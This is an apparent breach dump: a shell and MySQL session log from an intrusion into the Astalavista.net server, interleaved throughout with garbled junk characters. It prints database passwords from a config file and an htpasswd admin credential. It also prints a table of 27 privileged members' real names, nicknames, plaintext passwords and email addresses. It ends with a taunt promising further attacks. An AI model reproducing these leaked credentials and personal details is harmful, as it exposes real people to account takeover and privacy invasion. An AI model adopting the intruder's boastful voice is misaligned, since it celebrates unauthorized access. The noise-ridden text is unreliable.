* t1 I5 l$ V& x2 Y* W( @# w9 ldrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..5 N4 R- ^$ a$ v
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth3 s& D8 s0 h" }5 {9 b. L) ~
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history1 p/ U4 F$ O4 u3 d; g( m6 @1 C2 L6 O
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
' Y3 O/ G" D# l  M- E3 t% W-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile1 A0 G' Y8 q0 q, ~. U& S
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc1 V2 Y4 p% R) ~# _, M7 t& Y% p
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
7 M5 L% u# z4 J( i/ ^drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
* w- p2 Q' C; V! j" }' vdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
% J! ]! a' ?+ O" E; xlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html! k, K0 L# c- ?# E" ^& C* ?
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
8 n0 G% J" T) u9 S$ T6 s0 g$ _9 C& [" h# T2 D+ G5 p+ C, Q
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
( q0 U3 T3 N! Y9 ]  Ssh-3.2$ ls -la
7 x0 T/ T5 C, y1 j  qtotal 200
$ u# v9 b! x6 s4 m& n- U, Kdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 .& {" }6 a" h: a6 p0 x2 t9 a; P
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
: D4 Z! q. z, x! p) W. L7 kdrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
; n9 v! m4 ^" d6 G9 zdrwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql& C. p  s0 \# I( V: J; u
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com& `" ]! o' X+ O( E9 \! ^$ Q" }7 Q  c
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend# P- K  O5 P. ~+ k/ O
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
/ c) Q7 l% {4 Z; @-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg5 s: j. N8 c% U' X) U
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config) {# v1 j0 o) E  s2 `
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
- _6 J( |% ?2 G' gdrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd' h+ O, R0 p3 S+ x
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php9 M* |7 j2 {5 R
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico! i# ~8 [( J- Q& v: ]
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
, L% `" Y/ ~6 Z, \- d; Fdrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour6 }7 N6 F. a* Q) M# z5 ~( l
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
' U1 H3 D" h0 L- Z+ [4 p1 M-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess. }0 |- D# p1 m' J! P
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php; k. ~5 ?" B4 R8 Z* x) s0 V4 g) }
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html' [. s  C* T" c5 j6 K
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
8 E% O- w. `( U1 ^-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
# c2 c1 m3 `1 `# v! U8 q) a: O-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf) \4 q4 v& D- X9 p
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc7 t, k6 Y" @6 }- g
drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
% x; }8 O7 w6 B0 h2 G. u7 ^! W  Xdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib3 h2 D" [! f7 H& {0 ~1 F; r) [# C" k
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log2 N1 x6 ]' u, ~$ z
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member$ E4 v1 _2 E: V) |4 c
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
( h: j2 M) I1 s& pdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
) [, l( W5 m( U-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf: D  _; k3 \# @" z/ ?
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
$ M0 N, p  n: A) Y-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
$ n1 i3 o( r+ }4 i) |) V; Odrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
0 M- _, f2 ?! v$ f, Rdrwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources+ ]9 F" I6 S$ L
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com0 t: y# C! q8 M  [& u' R" J5 t( X1 e
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes2 N4 _1 d7 y) d9 m
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src* z! }! m8 y. F( @, I, S
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
3 O4 M9 ?+ `- z8 w2 Tdrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2% b$ U& e, @) D- k# M- O: b9 |
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
7 e6 q4 Z: T  B; W7 f& r6 a-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php, G* y5 Z' _8 J- X3 l
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki0 b# V# |: x2 e( Q2 x" V+ p- H
9 U- c" s  @. Z' l1 ~$ R
sh-3.2$ head -20 index.php' X& V+ F4 b" \
<?PHP
0 a) c8 Z" t; m( ^& R/ @. e/**
# S+ y! v$ c1 |* Mainfile (external) for astalavistaNET v2.0' F# f$ b# ?3 [5 {$ P
*
" h7 Y1 G( j$ t) ~* @copyright     Astalavista IT Engineering GmbH, a# s5 _- i2 v( [- a9 ?
* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
9 ]2 E1 d' W* s" _( u# P* @version       1.0
1 @+ v: X! m) [$ G: v5 f/ \. l$ r*/
0 S  \% |  a% \
; u1 T. w5 u# h+ f9 Z. S# ~        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
0 g9 x$ y7 E5 }+ W                $dontStartSession = false;
6 Q6 W) \! N0 T0 g" a6 q        } else {# G3 [  t3 B0 T$ S
                $dontStartSession = true;' B1 N( u5 k! X( P5 f/ y
        }
3 j* L* Y9 c9 I! \* _% U        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
5 e# m) w0 @/ z0 k7 }        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);- ?) h& _' m2 |* e: q# x8 @
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);, U5 d# l: {; L; @
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);) P  v) ~. d! Z( y

  T" d9 u5 D3 `1 Qsh-3.2$ cd config
/ [- O- Q8 }9 }9 ^/ vsh-3.2$ ls -la: H% e: ?$ ~4 q  P+ P/ d
total 32
% A. P% Q: H% u0 u; d- {" pdrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
4 [' V9 l  Y% C2 |" j% H0 A( ?drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..2 Y0 f  {" ?' K0 [6 M' w
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php3 o( i& t; J2 X# ?
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php0 i" A0 \: A1 y
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
/ O: F& r- o) D/ F9 p& J8 p-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php. M0 P$ G0 G$ y: |2 s6 f0 ~
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
. @3 d' L6 \! Q- q7 `9 a1 u
9 y! L+ i' F  xsh-3.2$ cat com.conf.php
1 {: e( v$ v) R( {/ l' U5 J8 C[snip]
6 r; n* r3 m+ ^, M  \//member-database
# T. x% f1 k3 r/ P$_CONFIG['db_mem_server']       = ‘localhost’;& X- H! @- x! _2 q7 A
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
% S! H& a5 F8 Y8 k3 A, m3 s+ U4 R( r$_CONFIG['db_mem_user']         = ‘astanet_db’;9 R# _( `! Y9 E0 o2 K" [
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;0 j' G! y6 j( M. M: o
$_CONFIG['db_mem_debug']        = false; //true or false# Z. w+ o3 M6 G  A5 Y! G
//ads-database2 i# Z# {. T6 l
$_CONFIG['db_ads_server']       = ‘localhost’;
0 T2 t4 o5 R9 A4 R# U$_CONFIG['db_ads_database'] = ‘astanet_ads’;3 l5 _$ u9 Q$ p- O. w
$_CONFIG['db_ads_user']         = ‘astanet_db’;
: R+ G& w2 g) W0 B$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;# q& o+ M3 v/ U% R2 e! M/ A' s
$_CONFIG['db_ads_debug']        = false; //true or false: P6 ~" M! K; \6 {) N( S
//rainbow-database
" M0 i' W. P2 F/ A0 d$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;6 |+ Q$ d$ g( o5 G' Q2 Y
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
: R/ g7 T# V( q$_CONFIG['db_rainbow_user']     = ‘dinu’;& w3 ~2 f; E' m4 i+ D4 s- ?$ P6 h6 d
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
" R# }! {/ J) b$ O- ~$_CONFIG['db_rainbow_debug']    = false; //true or false5 m9 V8 Q8 @  P+ c- e/ }; }: O
//mailing lists database
! u* N2 z( [* T6 m) r# m( t) n$ l$_CONFIG['db_mailing_lists_server']     = ‘localhost’;. x, m5 d% X+ M8 H+ V2 q( [) w
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
; _  L5 r6 N5 V! n* F2 X  j( j$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;7 M0 E9 S8 a- s0 P; Q" B8 g8 J! J
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;) Q4 l4 {/ p* J3 v! @8 G, m
$_CONFIG['db_mailing_lists_debug']              = false; //true or false3 d- P: G2 T0 A: G% Q3 b) d& f
//paypal! N5 E" k1 V/ t6 R
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
6 C9 U( h# o. g1 ]  Y) _* K$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
5 ^6 X* k3 E( x  y4 O$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
! v  P: t! L$ ~8 p- s$_CONFIG['sub_pp_noship']       = ‘1′;. S" ?& V4 j, s% G- _, x. n& L! \
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
# B6 ~/ o. X1 C6 f6 d$ |- D0 j[snip]4 c+ b6 z6 [( l1 A: \

) Q; @5 j9 f1 h# _7 o/ u4 Qsh-3.2$ cd ..
0 W7 b' q& U2 z  W  qsh-3.2$ cd member
: f5 P6 e5 v/ Q* Z' Y8 rsh-3.2$ ls -la: l& a3 r& m5 a- t; b& ]0 ^3 I
total 205 h' x5 j4 A' o
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
9 x6 k) ?! k3 f6 bdrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..% W, {7 ~3 t5 P# Z1 k, r  n7 n
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
# _( q" {; J/ _; ?-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
  d' Z3 m2 ^8 g5 jsh-3.2$ cat .htaccess2 y, [# A3 [; w1 O+ ^8 k
SecFilterEngine off
1 U% C. C/ l) L* H, P4 K7 y  B/ \7 f6 X3 E* O3 V' }
sh-3.2$ cd ..
8 ~+ d  U& S- r( r! c* Rsh-3.2$ cd cron/ m9 F  L+ h$ f) \
sh-3.2$ ls -la
0 ?% K, P" x+ b) dtotal 168. }0 v4 x! E; Z
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
2 ~* ~6 B: A" _; b9 q& Gdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..9 R2 M  ]  Z# q2 c% L  n# z
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php1 M9 c" Z/ `# b/ K
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
! a# j( k/ J5 e, t/ L-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php6 C6 V0 ?4 J- ^, A$ l
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
: L! E) F9 b3 x  b8 t+ C-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
# s! z$ z: q6 H& I-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php- q: y& ?' i2 O6 l1 C
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php. d- N( @& q( J" j: S5 I
-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php% G7 F7 i. }* K" E* L1 h
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
0 r& {- R* R5 \* E-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php' k& }1 O0 W$ `" I# g! z
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
$ m  r! ]( q9 X  z% C-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php* Q0 h' U; v' ^' ]
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh0 O. v. Z; |- e( k2 f
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
& \9 v/ R/ Q4 c1 J  j' L-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php& `/ L% I; o0 r( t: `
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
% I7 F5 y, e  P8 D  o8 K2 v/ o-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
4 y5 ?3 s. F! S" u& u) T9 ]-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
0 f) x8 C6 x* A' _drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
8 X4 M1 F% h3 N# ]-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
& I% I4 {; V9 b- }" r% B-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
7 @8 E5 E9 R% a1 G& i) `/ u( t+ j# Q% i
; n% Q4 z% J$ c8 n" m; G% M5 Lsh-3.2$ cd ..0 X3 [2 l- g2 o! Y7 e
sh-3.2$ cd _007
9 g1 A4 e' ]2 W9 k, {, h$ f+ o1 S4 fsh-3.2$ ls -la8 B# ?0 ]" k! {1 R" R6 b5 E) d
total 24$ p8 `( W$ q$ ]; R1 S7 f  B& W+ |$ ~
drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
+ I# R+ ~# f8 f: `; [drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..% H0 e9 P1 G# d* G/ {
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
9 k5 p+ m5 G! M8 d/ B  [. c-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
7 a/ K' e, p' h2 w& M  Z9 u& W-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
9 i/ @6 |3 `! ^; d1 M* e, Mdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap5 d, V+ z  L! K/ ]/ S
! U5 c! J/ [/ B4 F9 U
sh-3.2$ cat  .htaccess7 x1 K- Q' b9 a7 P6 g, P
authType Basic
( A' o1 D" J# [2 rauthName Admin
9 |5 i: u& h0 s9 C2 xauthUserFile /home/astanet/auth/.htadm_pwd0 E( N0 ~5 z7 i
require valid-user
4 t* q+ ?; L* B- E" M2 _3 |
' g* N+ s! n8 C! i2 W/ j5 ]sh-3.2$ cat /home/astanet/auth/.htadm_pwd
: r  `6 @# b2 E( u2 ^admin2net:CR0bl65MwhfT
2 x+ E1 v" W- f0 c
( F3 ?3 C" d8 l: Msh-3.2$ mysql -u astanet_db -p
( K+ y4 X8 ~8 j+ k! ]Enter password:
8 u$ O/ v1 a- z: g  uWelcome to the MySQL monitor.  Commands end with ; or \g.: N8 `+ R& n; N. Y/ k7 d
Your MySQL connection id is 275153
  [) {6 r& J9 M! y/ T) ^* [1 z3 k/ ?Server version: 5.0.45-community-log MySQL Community Edition (GPL)
8 p5 ^7 u- S9 a0 _! G4 y( w7 S  I, ^, E
# B: E7 P) t( y$ ^9 W) l2 wType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ {! G' m9 o, H/ @
5 h* G9 G) F+ {* N
mysql> show databases;
. M1 f+ @# e! Z9 ]$ w+———————–+
4 H8 I8 h& z. K. \' H7 Q| Database              |
6 s8 D2 R1 p9 x0 C+———————–+0 p# A, y* [, h
| information_schema    |6 B- H2 O3 r' ?% c# a% I
| astanet_ads           |
9 y3 H; L4 F6 r/ C: T| astanet_mailing_lists |2 r5 n( B% n5 J, [
| astanet_mediawiki     |
; |  c. B' E8 P% K+ m| astanet_membersystem  |' U( h* r* F8 m% }, H
| test                  |; Z* O: y% m, U  s5 w
+———————–+
! G- _0 K5 l8 J6 rows in set (0.00 sec)
8 o" [( B) G( e4 N* M
- U3 a$ f: {' T+ zmysql> use astanet_membersystem) T5 Z. n: s3 s
Database changed! N8 l7 w4 }6 B$ p8 a8 Z. d
mysql> show tables;
' n6 N% o6 I3 z, q$ i% ?+———————————–+
$ n5 n& Y( G1 R  j| Tables_in_astanet_membersystem    |7 r! Y. H* \2 P* j9 E3 r
+———————————–+
+ t* i6 G* X$ V9 B. f| blacklist_categories              |
' {9 f0 y% I; d0 a$ w| blacklist_content                 |  s/ c5 ~$ C! D7 R" ^* ?1 h8 g# a
| blacklist_levels                  |
! A  |( n) y! ^5 P/ O| blacklist_mcset                   |: @4 w. n# W5 Y' y! X- K
| dir_categories                    |
- a3 ?: P0 ^& u; l4 w8 i| dir_comments                      |
0 M6 j& V4 ^$ e8 p& P| dir_links                         |
7 c$ Z4 {% u2 L2 ^( O0 V| dir_temp                          |; j8 H5 |0 v2 s! l. h" J% B# D
| dir_votes                         |
9 _$ }' j, N5 u- n( o| documents                         |
7 P0 A% |/ j% ^) U- X& _4 v; k) _| documents_categories              |
$ |- h! y# k. Z3 w  H| email_content                     |
  Y5 h2 R  ]$ g/ a3 p| email_settings                    |' a! k8 t7 t  v
| exploits                          |! f& a" j3 g9 S' C- V1 g% G
| exploits_categories               |
# i$ l1 ]! i  \3 L| exploittree_categories            |' y" `: U0 S3 W- ~) V
| exploittree_exploits              |
' V0 s" O' O. G  l+ v: J! a' W, E) D| home_values                       |
: v* l" i  I1 y% u0 H| iso_countries                     |% x7 k; m& y, {. V; |! H
| links_categories                  |$ w2 t/ k( e8 I* L& Z
| links_records                     |- L8 Q3 f' w. N- x7 H; W
| links_unauth                      |
. M7 m2 E9 R$ I% m( E3 P| links_votes                       |
8 \4 J5 X$ J1 {| log                               |
- v, S% s- ?; I* x7 Q- L% D| news_categories                   |/ V, d  E+ R1 B: T( @& G
| news_comments                     |
* Q) v  b: d* p| news_emoticons                    |# n% z* ^, g. D/ Q
| news_latest                       |
" [6 g: j! v! \" N7 j' l0 v| news_messages                     |
, |# }8 q4 d  u, `| news_statistics                   |0 H$ I$ f1 v) S0 w  J
| news_votes                        |
" m6 P  E4 p" d; ]: G$ o' M| prices_content                    |+ p8 t) x& B6 u' N% R
| prices_offers                     |
2 M$ h2 F7 \! ^  H  || rss_settings                      |* l3 c2 A; X1 D( R& Q2 p
| sessions                          |
6 X8 j# h$ u2 k# e  x% ~| stats_signups                     |
7 I2 z! L" Z' J9 i/ ]$ _, y| u2u2                              |/ G' e: q2 M7 j5 F
| u2u_contact                       |, r8 x, F) i; J3 b0 P
| u2u_settings                      |* U+ g5 Z" ?) V5 t4 r+ k" R: E7 |; T
| user_keywords_selected_categories |
& ]2 Z* C7 _) d: g| users                             |
; g# Q: Y  B% B# ~1 X3 L  x| users_ipn_test                    |
8 v: a( i. t; g| users_keyword_values              |
7 Y! O& I& R* x$ [1 H( ~| users_profile                     |
' I  z& E- j" G9 |$ m5 m| users_temp                        |& u6 ~$ Q6 n0 f
| users_upgrade                     |  G& W) u, I9 b- [  d0 g
+———————————–+
; I/ \: L; s% O3 L6 R$ e46 rows in set (0.00 sec)# g) o, [$ z- T$ l8 g$ m
# a' l6 j7 _1 t5 C) _
mysql> describe users;
6 z- x$ }8 t, n+————————–+————————————–+——+—–+———————+—————-+
- q+ v9 T5 k, Y1 a7 H| Field                    | Type                                 | Null | Key | Default             | Extra          |
9 Z1 S/ z( D" _$ Q+————————–+————————————–+——+—–+———————+—————-+
7 K6 G  k% C9 L) p2 Z| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
4 `4 X' i, ?* P! e. [; l| user                     | varchar(50)                          | NO   |     |                     |                |3 i, ~; P$ c( k8 {% P/ g7 M
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
0 y0 b6 h4 ]+ ~! d4 R% q| password                 | varchar(30)                          | NO   |     |                     |                |
5 N; Q8 C9 b* [) Q; r, C; q| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |) `4 d3 s7 T, R& D9 m3 S- a" d
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
; c( Y; ?1 q* d8 S9 B4 T| email                    | varchar(50)                          | NO   |     |                     |                |# q( q8 _! B) {, {: [* Q5 C0 g
| ip                       | varchar(15)                          | NO   |     | 0                   |                |0 H4 g: p, U* m1 L: R* R: C
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |# z: G5 O3 b: w% o/ {
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |% C$ B  t2 q1 \4 H1 i8 x
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |2 `/ W* ~1 ?: _3 b$ v
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
( f+ p5 G3 c3 a2 j' A: U& @- T0 V| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |1 f) q  j. x; G8 `8 P% z
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |# \, x% B7 T& s- l5 e; o
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |2 f/ f( f- |, @* Y1 W" z: u' Z! O
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |  Q1 ?. P# `# k2 k6 D  ]3 t6 t
| lang                     | tinytext                             | NO   |     |                     |                |
! S: N2 }" ?: H5 g| adid                     | smallint(6)                          | NO   |     | 0                   |                |8 W- J$ t3 E* t8 j' n0 ~/ b
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |+ A) v: s2 g4 L1 e0 x
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
: ~; t. `. v0 _* O  A| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |3 q8 ~& c- |$ `; f& \7 U1 l% f
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
# B2 j) K6 l# j9 B+————————–+————————————–+——+—–+———————+—————-+9 e( p4 a' s6 X+ I$ [, T
22 rows in set (0.01 sec)
1 D6 E6 S1 Z* `( ?/ I- \
/ X8 W) H  ~5 e: W! Mmysql> select count(*) as skids from users;7 s+ B0 J' P! M
+——-+
# {$ \( r+ r9 }% l& E| skids |: k) ~3 ]( Z& Y
+——-+
% p, J1 w9 l+ S5 a5 P1 @| 25199 |
3 C; n- }8 |/ I+——-+% `5 }4 Z/ o5 w/ U' P: i* I% E) g! G
1 row in set (0.00 sec)
) a/ a! J/ _+ D( P) I0 u. h! ^% U$ F( C8 P  y
mysql> select user,nickname,password,email from users where userlevel = 1;, i+ |* L! h/ r
+————————–+———————-+——————+———————————–+) s3 N) U6 c0 {2 I" n
| user                     | nickname             | password         | email                             |
* B5 F0 C$ E; n; ^/ Z+————————–+———————-+——————+———————————–+) H1 l& d' s# `- V+ d
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
. C: l; v# B9 f8 H, i9 x' W: g0 Y5 i| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
: e3 C' e0 V2 j" U! Y8 L9 ~# C9 S| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
$ ]: R3 J- A% @3 ?| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |. G) h) y1 F, o1 u  G. U  M
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |/ j7 v1 Z/ b) @) E. {% j5 w
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |2 t+ x' g; t2 l% ~* y4 s
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |6 ?6 W, e0 R7 n' e' P2 j
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |: L+ H' l6 `3 }5 ?9 O, [
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |( J; o9 H. \; T) S
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
. v7 p# z, b: ~| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |# l7 G0 K2 J2 I- m$ n! }
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |0 _8 K, `, ?2 b" i& C
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
4 N$ ~% E- Z4 I2 |7 S: U| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |; \& w& f- M0 w* U' f1 ?& V
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
$ _: f' i  C( ?5 H4 L| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |5 c/ t4 |" o4 a, e9 t! ~' b
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |. R: i8 T9 G# Q% L# y6 u% n
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
, `& v. s. E& p+ O0 o| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |  y, H5 v8 X4 K1 @2 l  S$ r! O
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |( j4 n" O& D9 E. [  B# R9 d6 g! @
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |! {. Q3 f6 }. K2 A/ a7 }
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |* I( y) [) j0 t# K4 w
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |( t$ E. j3 y3 s8 k
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
* n3 V& {& T' W( S| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |( V# N# t* D0 n7 S/ Y
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
+ P# u7 K4 o2 ?/ s- w) S| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |9 @* G! u& z" I% }
+————————–+———————-+——————+———————————–+
0 T: K. K1 U! P: o8 u27 rows in set (0.00 sec)
/ g/ g. a  u8 K2 m! }; Y+ D% L/ ]9 j! }- ^) C& O
mysql> exit;/ ], U* r: ?* q$ m
Bye' w+ G; B1 ^( j/ }

9 G: T1 n0 H& M2 o  ?[~] plaintext passwords? yes,
6 z) }$ Q+ J( R( h! w9 y+ ~. RThose so called “security professionals” who charge you $6.66 / month to
' u+ W$ x5 ^* M" d6 ~) Wregister at their hack-proof portal, save your passwords in plaintext…
. W9 J& L. e5 i$ [! K+ _brilliant!
6 D6 k( C+ w) v% `$ [$ L9 m$ A0 B& C% P/ u& K2 ~* i
[~] This been fun but we want more.& T; Z( J' r! u, e5 K
7 o$ X% M* {6 d! \2 k+ |+ I
sh-3.2$ uname -a$ B( P  X$ O. Q% O" z7 |2 z
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux9 D6 }- v! d$ M- S4 Z, R
